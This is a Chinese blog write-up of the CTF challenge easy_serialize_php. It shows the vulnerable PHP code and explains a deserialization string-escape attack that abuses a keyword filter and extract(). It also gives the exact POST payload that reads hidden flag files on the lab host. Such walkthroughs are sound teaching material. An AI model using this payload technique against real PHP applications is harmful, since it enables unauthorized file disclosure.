[安洵杯 2019]easy_serialize_php

已于 2022-10-21 11:37:20 修改
阅读量918 收藏 2
点赞数 1
分类专栏: BUUCTF-web 文章标签: php 开发语言 安全
于 2022-06-10 17:44:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44749590/article/details/125215930
版权

[安洵杯 2019]easy_serialize_php

打开靶机,访问源码:

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}     				//过滤掉了php、flag、php5、php4、fl1g关键字


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){  //img_path为空,对img赋值默认图片
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{								//img_path非空,获取图片路径进行base64和sha1编码
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

根据提示访问:

/index.php?f=phpinfo

得到php相关配置信息:
在这里插入图片描述这里的dog3_flag.php很有可能就是flag文件。

进行源码审计,逆向分析:

file_get_contents(base64_decode($userinfo['img']));
肯定要利用文件读取dog3_flag.php文件,这里只进行了base64解码,说明默认img为guest_img.png,如果指定img_path为dog3_flag.php会进行sha1加密,最后也获取不到文件内容。那么如何通过不指定img_path的值使得img的值为dog3_flag.php呢?继续审计代码。

$serialize_info = filter(serialize($_SESSION));
首先会对_SESSION进行序列化,然后进行关键字的过滤。

若SESSION参数:
$_SESSION["user"] = 'guestflagflagflagflag';
$_SESSION['function'] = 'aaaa';
$_SESSION['img']=base64_encode('guest_img.png');
序列化:
a:3:{s:4:"user";s:21:"guestflagflagflagflag";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter关键字会过滤掉flag,于是序列化字段会变短,过滤后的结果:
a:3:{s:4:"user";s:21:"guest";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于user字段值的长度仍为21,所有会往后吞21个字符,一直吞到guest";s:8:"function",那有没有一种可能我让function的值足够长能够包含我们指定为base64(dog3_flag.php)的img序列化的内容字段且被过滤掉关键字长度刚好能把img序列化字段吞进去,达到指定img赋值的效果?上栗子:
首先得让img序列包含在function中这样我们才能通过吞取赋值img的值,我们指定:
$_SESSION["user"] = 'guestflagflagflagflagflagflagflag';
$_SESSION['function'] = 'aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}';
在序列化SESSION得:
a:3:{s:4:"user";s:33:"guestflagflagflagflagflagflagflag";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter过滤的结果:
a:3:{s:4:"user";s:33:"guest";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于替换了7个flag关键字,会往后吞28个字符串,刚好将guest";s:8:"function";s:69:"aaaaa 赋给了user,后面构造img变量,后面是随便添加的一个变量,刚好满足三个变量,反序列化读取到webctf就结束了,后面的img被丢掉了。这样就完成了img的赋值。

playload:

http://272ed79b-77e4-46d7-92a3-b723c4013aa6.node4.buuoj.cn:81/index.php?f=show_image
POST:_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}
在这里插入图片描述

提示flag在/d0g3_fllllllag文件中
在这里插入图片描述
/d0g3_fllllllag的Base64编码为L2QwZzNfZmxsbGxsbGFn,更改img为L2QwZzNfZmxsbGxsbGFn,访问
在这里插入图片描述

甜筒化了 -
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
buuctf easy_serialize_php
qq_52671379的博客
03-30 1863
buuctf easy_serialize_php
[安洵杯 2019]easy_serialize_php 详解
最新发布
weixin_62306641的博客
02-14 197
在这道题中是将falg,php.......等字符串替换为空,替换完成后对象名,对象的类型,对象的长度都没变,但是内容没了。那么他就会依据长度吧后面的内容给囊括进去。反序列化中的对象是以{}作为开头结尾的,并且有对象名,对象的类型,对象的长度。但是他给出的例子中并没有$_SESSION[img'],这时候就需要利用到php反序列化逃逸。巧合地是,这时候又变成了一个完整的反序列化内容,又可以被解析,于是我们就可以依据这点来利用。从上述例子可以看出来,当序列化再反序列化后,依旧可以根据键名的到值。
[安洵杯 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3013
[安洵杯 2019]easy_serialize_php 反序列化
[安洵杯 2019]easy_serialize_php--序列化绕过,extract()函数。
cainiao17441898的博客
06-06 331
解题: 打开源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESS
BUUCTF刷题记录(4)
bmth666的博客
04-12 1282
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
buuctf[安洵杯 2019]easy_serialize_php
2202_75317918的博客
03-30 411
buuctf[安洵杯 2019]easy_serialize_php
BUUCTF - Web - easy_serialize_php
1tachi的博客
12-07 398
文章目录源码分析知识点payload其他解法 源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
#jet_serialize 用于 Javascript 的扩展序列化程序
Python库 | flask_serialize-1.0.9-py2.py3-none-any.whl
05-31
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:flask_serialize-1.0.9-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
浅谈php serialize()与unserialize()的用法
12-18
serialize()和unserialize()在php手册上的解释是:serialize — Generates a storable representation of a valueserialize — 产生一个可存储的值的表示unserialize — Creates a PHP value from a stored ...
web buuctf [安洵杯 2019]easy_serialize_php
weixin_44214568的博客
04-02 414
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
easy_serialize_php
beihai2013
01-19 432
easy_serialize_php 考察:php代码审计,php序列化 打开页面,打开view-source,可以看到源代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace(
buuctf web easy_serialize_php1
qq_41696858的博客
12-09 482
审计源码 <?php $function = @$_GET['f']; //正则匹配 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SES
[安洵杯 2019]easy_serialize_php 1
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个属性值,最后再将其序列化回字符串。 具体的操作步骤可以参考以下代码: ```php <?php class User { public $name; public $age; } // 反序列化 $data = unserialize('O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $data->age = 20; // 序列化 $serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的对象,有两个属性;`s:4:"name";s:5:"Alice";` 表示 `name` 属性的值为 `Alice`,`s:3:"age";i:20;` 表示 `age` 属性的值为 `20`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值